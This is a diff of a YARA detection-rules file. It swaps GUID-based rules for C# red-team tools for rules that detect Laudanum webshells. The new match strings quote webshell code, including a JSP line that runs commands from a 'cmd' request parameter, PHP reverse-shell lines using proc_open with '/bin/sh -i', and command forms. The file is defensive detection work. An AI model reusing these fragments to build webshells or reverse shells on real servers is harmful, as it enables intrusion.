-		id = "4f87ca2c-3ac1-5733-893e-79665b80ffc3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/KNIF/BYTAGE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1175-L1188"
+		description = "Laudanum Injector Tools - file settings.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "054b8723-fdfa-51dc-91ae-b915e40b2e54"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L68-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d295501a64515a68bbd9a3c7f0f5ca0bbf59df5f6c91dd66d2ce6e744ce3fc1"
+		hash = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
+		logic_hash = "b02e293e659fa77257d0642c57e51d6ae712d9221ae295cf69bb845f68c650ee"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8e46ba56-e877-4dec-be1e-394cb1b5b9de" ascii wide
+		$s1 = "Port: <input name=\"port\" type=\"text\" value=\"8888\">" fullword ascii
+		$s2 = "<li>Reverse Shell - " fullword ascii
+		$s3 = "<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a>" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 13KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Multios_Reverseshell : FILE
+rule SIGNATURE_BASE_Asp_Proxy : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f54bcb1a-b0cd-5988-bf1d-4fa6c012d6b9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/belane/MultiOS_ReverseShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1190-L1203"
+		description = "Laudanum Injector Tools - file proxy.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6193b48a-b3da-5c1e-84e8-0035d9e7ade6"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L85-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a0b7f881aee1097dcbbd39a832073aada103b23ebc5b167052e9483083fec02d"
+		hash = "51e97040d1737618b1775578a772fa6c5a31afd8"
+		logic_hash = "f53c97a2bf31f411b3220dc741b85d0edf96e9b92474f1abd5ac443be6b92897"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "df0dd7a1-9f6b-4b0f-801e-e17e73b0801d" ascii wide
+		$s1 = "'response.write \"<br/>  -value:\" & request.querystring(key)(j)" fullword ascii
+		$s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii
+		$s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii
+		$s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii
+		$s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii
+		$s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hidefromamsi : FILE
+rule SIGNATURE_BASE_Cfm_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0fa1ce82-b662-5e18-a5da-8359c96cd6e9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/0r13lc0ch4v1/HideFromAMSI"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1205-L1218"
+		description = "Laudanum Injector Tools - file shell.cfm"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5308eecf-a59f-5100-ab60-5034c5b73e7e"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L105-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "05fccd4c7346c1ac1830984f945f5d37ca3e44a479287d681dfdb06d200764f1"
+		hash = "885e1783b07c73e7d47d3283be303c9719419b92"
+		logic_hash = "961eb398422e3c528b886c150f11dcb8a6832f0ea48e20ddc381e1f2740bd0c6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b91d2d44-794c-49b8-8a75-2fbec3fe3fe3" ascii wide
+		$s1 = "Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>" fullword ascii
+		$s2 = "<cfif ( #suppliedCode# neq secretCode )>" fullword ascii
+		$s3 = "<cfif IsDefined(\"form.cmd\")>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnetavbypass_Master : FILE
+rule SIGNATURE_BASE_Aspx_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4004271b-4fbe-58bb-9613-a077e76324b3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/lockfale/DotNetAVBypass-Master"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1220-L1233"
+		description = "Laudanum Injector Tools - file shell.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d4287007-79af-59fa-b8c8-3ac08d75b3bd"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L122-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3382613db4970475922fb7db70b6ce4f9c247f083a2164b86ba9e81a770e0e36"
+		hash = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
+		logic_hash = "b31c36f53d46e17b6d97e582e46c540928a386e2075b841f5c11b959a0c68462"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4854c8dc-82b0-4162-86e0-a5bbcbc10240" ascii wide
+		$s1 = "remoteIp = HttpContext.Current.Request.Headers[\"X-Forwarded-For\"].Split(new" ascii
+		$s2 = "remoteIp = Request.UserHostAddress;" fullword ascii
+		$s3 = "<form method=\"post\" name=\"shell\">" fullword ascii
+		$s4 = "<body onload=\"document.shell.c.focus()\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdpapi : FILE
+rule SIGNATURE_BASE_Php_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1394323f-b336-548f-925c-c276d439e9eb"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/SharpDPAPI"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1235-L1249"
+		description = "Laudanum Injector Tools - file shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8d3dcb16-090b-5a9f-b3d2-3822ec467f69"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L140-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "70f40bc48eeba3f835a280e7e2ce06b2a16179be9914d5c2548c820b02f4c837"
+		hash = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
+		logic_hash = "dc798508434686bbcb4fa0bb47381252bfa0491b0987956fd4c5aa13b7f57810"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "5f026c27-f8e6-4052-b231-8451c6a73838" ascii wide
-		$typelibguid1lo = "2f00a05b-263d-4fcc-846b-da82bd684603" ascii wide
+		$s1 = "command_hist[current_line] = document.shell.command.value;" fullword ascii
+		$s2 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword ascii
+		$s3 = "array_unshift($_SESSION['history'], $command);" fullword ascii
+		$s4 = "if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Telegra_Csharp_C2 : FILE
+rule SIGNATURE_BASE_Php_Reverse_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "495a5f3e-cf05-5a66-b01c-8176ded88768"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/sf197/Telegra_Csharp_C2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1251-L1264"
+		description = "Laudanum Injector Tools - file php-reverse-shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "306d150f-95a8-57fd-8f5e-786c429af6b3"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L158-L173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ebdec8d1781ffc106f93f3686eb96e6b79810fbb0c7b1eb7cbbb161397298adc"
+		hash = "3ef03bbe3649535a03315dcfc1a1208a09cea49d"
+		logic_hash = "ea8e320abb57e0467db92271f7d36f144f85e04ce15cd9fa8d3f53dfa8d43929"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "1d79fabc-2ba2-4604-a4b6-045027340c85" ascii wide
+		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
+		$s2 = "printit(\"Successfully opened reverse shell to $ip:$port\");" fullword ascii
+		$s3 = "$input = fread($pipes[1], $chunk_size);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 15KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcompile : FILE
+rule SIGNATURE_BASE_Php_Dns : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c5e053c4-1c90-581a-a6c3-087b252254b2"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/SpiderLabs/SharpCompile"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1266-L1279"
+		description = "Laudanum Injector Tools - file dns.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a52e453b-07aa-58b9-91e7-f2426a8e8976"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L175-L191"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a8b46bf3017f336dc669b6c81a339953cc8931df49283b67172f45d1715ef422"
+		hash = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
+		logic_hash = "650eecc06f215ae6a15078c87d8a8c1597ca9e3d735eacd17b046a9d9deb6aa8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "63f81b73-ff18-4a36-b095-fdcb4776da4c" ascii wide
+		$s1 = "$query = isset($_POST['query']) ? $_POST['query'] : '';" fullword ascii
+		$s2 = "$result = dns_get_record($query, $types[$type], $authns, $addtl);" fullword ascii
+		$s3 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
+		$s4 = "foreach (array_keys($types) as $t) {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 15KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Carbuncle : FILE
+rule SIGNATURE_BASE_WEB_INF_Web : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4a87882e-570b-5b40-a8e3-47ebac01d257"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/checkymander/Carbuncle"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1281-L1294"
+		description = "Laudanum Injector Tools - file web.xml"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8d0a008c-56d1-59ef-8521-0697add21ba9"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L193-L207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f792c3ed1f62915635dc9090cc608475701d1a4ec60810946336a5d72280af48"
+		hash = "0251baed0a16c451f9d67dddce04a45dc26cb4a3"
+		logic_hash = "b58bb63a5268812ed6a5d18c8da96b0fdae33e4802a2fba4964ab69e92517a16"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3f239b73-88ae-413b-b8c8-c01a35a0d92e" ascii wide
+		$s1 = "<servlet-name>Command</servlet-name>" fullword ascii
+		$s2 = "<jsp-file>/cmd.jsp</jsp-file>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ossfiletool : FILE
+rule SIGNATURE_BASE_Jsp_Cmd : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fa9aeae1-2aa5-51af-81e2-22a1b6fcda81"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/B1eed/OSSFileTool"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1296-L1309"
+		description = "Laudanum Injector Tools - file cmd.war"
+		author = "Florian Roth (Nextron Systems)"
+		id = "74db62b8-82d5-5a34-aa72-2f85053715a4"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L209-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0dda05d0a53babdf83a2edf9ac0ed21954c059baa73963c79fb840c737865df1"
+		hash = "55e4c3dc00cfab7ac16e7cfb53c11b0c01c16d3d"
+		logic_hash = "ab5b013a385549322bcb2811fa1a2d14b5633e2c41b9486b1e1c50c02437b8e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "207aca5d-dcd6-41fb-8465-58b39efcde8b" ascii wide
+		$s0 = "cmd.jsp}" fullword ascii
+		$s1 = "cmd.jspPK" fullword ascii
+		$s2 = "WEB-INF/web.xml" fullword ascii
+		$s3 = "WEB-INF/web.xmlPK" fullword ascii
+		$s4 = "META-INF/MANIFEST.MF" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x4b50 and filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Rubeus : FILE
+rule SIGNATURE_BASE_Laudanum : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "54638fe4-84b5-51a8-8c88-9c50ab09ff49"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/Rubeus"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1311-L1324"
+		description = "Laudanum Injector Tools - file laudanum.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8c836aba-3644-5914-a3ff-937d0a6cd378"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L228-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3d2df79b86b2c1eb4721ee9b6fce920db3e48f9cf96fa693876a6d7d8dad54e6"
+		hash = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
+		logic_hash = "53caad87d22b5f13e5b7be8720baa1d436cc57d8062ec5d557df8524a2ccfb68"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii wide
+		$s1 = "public function __activate()" fullword ascii
+		$s2 = "register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Simple_Loader : FILE
+rule SIGNATURE_BASE_Php_File : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4c26aaf9-187d-5990-b956-1bbf630411f0"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/cribdragg3r/Simple-Loader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1326-L1339"
+		description = "Laudanum Injector Tools - file file.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "68456891-6828-5e42-b8a0-67ecaf83cdc0"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L244-L260"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0dff8268f2c0c0764736727c78c648567b42cd3e177a7b73aa47a5afdf2f6d4a"
+		hash = "7421d33e8007c92c8642a36cba7351c7f95a4335"
+		logic_hash = "85c14a9c8a6aece231b1cb6dcdd7ed39fdc6aced868c34557ee2e2204ce7007b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "035ae711-c0e9-41da-a9a2-6523865e8694" ascii wide
+		$s1 = "$allowedIPs =" fullword ascii
+		$s2 = "<a href=\"<?php echo $_SERVER['PHP_SELF']  ?>\">Home</a><br/>" fullword ascii
+		$s3 = "$dir  = isset($_GET[\"dir\"])  ? $_GET[\"dir\"]  : \".\";" fullword ascii
+		$s4 = "$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Minidump : FILE
+rule SIGNATURE_BASE_Warfiles_Cmd : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "51f64c64-f3fa-5543-83fc-5f0bf881ef03"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/3xpl01tc0d3r/Minidump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1341-L1354"
+		description = "Laudanum Injector Tools - file cmd.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f974255b-cfbe-57b0-af1f-eddb7f12f5ed"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L262-L278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "798c1c569b224442c2f7b98254062e8cd3b008cb6d7aefef3063d9d57dbfbaee"
+		hash = "3ae3d837e7b362de738cf7fad78eded0dccf601f"
+		logic_hash = "64724b24d9f5b5d78e231ea8196abb609237cc430c49f6ceeb99c9684a904568"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "15c241aa-e73c-4b38-9489-9a344ac268a3" ascii wide
+		$s1 = "Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));" fullword ascii
+		$s2 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword ascii
+		$s3 = "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">" fullword ascii
+		$s4 = "String disr = dis.readLine();" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbypassuac : FILE
+rule SIGNATURE_BASE_Asp_Dns : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "474d40aa-4bcc-58b5-a129-40bbd3a89e99"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/FatRodzianko/SharpBypassUAC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1356-L1369"
+		description = "Laudanum Injector Tools - file dns.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b0e30ca0-7163-5731-98c5-5a1893b8ea80"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L280-L296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa9aae20fc35bba3b88e32f03e832579ee48d03303e789a13949a859a6da1a3d"
+		hash = "5532154dd67800d33dace01103e9b2c4f3d01d51"
+		logic_hash = "808e879238a0c24e975c260fc95c05c91bdc0f73553a241bd00f5bf7e6622639"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0d588c86-c680-4b0d-9aed-418f1bb94255" ascii wide
+		$s1 = "command = \"nslookup -type=\" & qtype & \" \" & query " fullword ascii
+		$s2 = "Set objCmd = objWShell.Exec(command)" fullword ascii
+		$s3 = "Response.Write command & \"<br>\"" fullword ascii
+		$s4 = "<form name=\"dns\" method=\"POST\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 21KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharppack : FILE
+rule SIGNATURE_BASE_Php_Reverse_Shell_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "633d074a-b8c2-5148-ad80-6226b99be818"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/Lexus89/SharpPack"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1371-L1391"
+		description = "Laudanum Injector Tools - file php-reverse-shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f10cc33e-0cb6-5d08-af1f-5ef76368de9d"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L298-L312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "43701a68c6bbb5fc1217f9b47096dcc87d2b1ffa9399ba50df9f7e99cec2c0d8"
+		hash = "025db3c3473413064f0606d93d155c7eb5049c42"
+		logic_hash = "695dc565c273ed358f7d56526fa4956ba13b216d8897d0707e1660a82b745081"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid1lo = "b59c7741-d522-4a41-bf4d-9badddebb84a" ascii wide
-		$typelibguid2lo = "fd6bdf7a-fef4-4b28-9027-5bf750f08048" ascii wide
-		$typelibguid3lo = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide
-		$typelibguid5lo = "f3037587-1a3b-41f1-aa71-b026efdb2a82" ascii wide
-		$typelibguid6lo = "41a90a6a-f9ed-4a2f-8448-d544ec1fd753" ascii wide
-		$typelibguid7lo = "3787435b-8352-4bd8-a1c6-e5a1b73921f4" ascii wide
-		$typelibguid8lo = "fdd654f5-5c54-4d93-bf8e-faf11b00e3e9" ascii wide
-		$typelibguid9lo = "aec32155-d589-4150-8fe7-2900df4554c8" ascii wide
+		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
+		$s7 = "$shell = 'uname -a; w; id; /bin/sh -i';" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and all of them
 }
